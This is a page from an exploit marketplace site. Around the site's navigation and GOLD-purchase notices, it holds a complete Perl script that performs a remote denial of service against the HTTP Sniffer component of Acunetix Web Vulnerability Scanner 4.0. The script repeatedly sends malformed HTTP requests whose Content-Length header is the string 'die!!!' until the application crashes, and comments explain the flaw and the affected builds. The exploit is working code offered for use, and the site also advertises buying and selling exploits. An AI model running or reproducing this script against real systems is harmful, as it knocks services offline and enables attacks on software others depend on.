0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS
============================================================== Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS ============================================================== #!/usr/bin/perl -w # # Acunetix Web Vulnerability Scanner 4.0 <= Build 20060717 # HTTP Sniffer component # Remote Denial of Service # # Explaination: # I found a DoS in Acunetix WVS doing a little bit of fuzzing. # The flaw is triggered when a malformed packet is sent. Thus, an Exception Handler shows # an Error Window saying: "'die!!!' is not a valid integer value", but, if we sent the # same packet again (while that message still visible) the application will crash. # # The malformed HTTP packet contains an invalid 'Content-Length' field (string), and it # must be a positive integer. # # Acunetix' support: "The bug which was causing it to crash was also related to another # bug fix which was implemented in later versions.". So, in latest version, an Error # message like this appears: # ________________________________________________________ # |wvs.exe | # |--------------------------------------------------------| # |[X] An error ocurred in the application | # | |continue application|| # | |restart application || # ||send bug report||show bug report||close applicacion || # |________________________________________________________| # # Affected version tested: # Acunetix WVS (Consultant Edition) 4.0 Build 20060717 # # Non-affected version tested: # Acunetix WVS 4.0 Build 20060717 # # nitr0us <nitrousenador[ at ]gmail[ dot]com> # 01/01/07 . . . Happy new year. use strict; use Socket qw( :DEFAULT :crlf ); # $CRLF use IO::Socket; sub header { print "################################################################\n"; print "# Acunetix Web Vulnerability Scanner 4.0 <= Build 20060717 #\n"; print "# HTTP Sniffer component #\n"; print "# Remote Denial of Service #\n"; print "# by nitr0us #\n"; print "################################################################\n\n"; print "Usage: $0 <host> [port(default 8080)]\n"; exit(0xdead); } header() unless $ARGV[0]; my $port = 8080; my $acunetix_wvs; my $packetz = 5; if($ARGV[1]){ $port = $ARGV[1]; } print "\n[+] Connecting and sending $packetz malformed packetz\n\n"; for(my $foo = 0; $foo < $packetz; $foo++){ $acunetix_wvs = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $port, Proto => 'tcp') or die "Could not create socket: $!\n"; print $acunetix_wvs "GET / HTTP/1.0$CRLF"; print $acunetix_wvs "Content-Length: die!!!$CRLF$CRLF"; # Trigger $acunetix_wvs->close(); sleep(1); } print "[+] $packetz malformed packetz sent ];D\n\n"; print "[+] Acunetix WVS! killed ! ;)\n\n"; # 0day.today [2024-07-02] #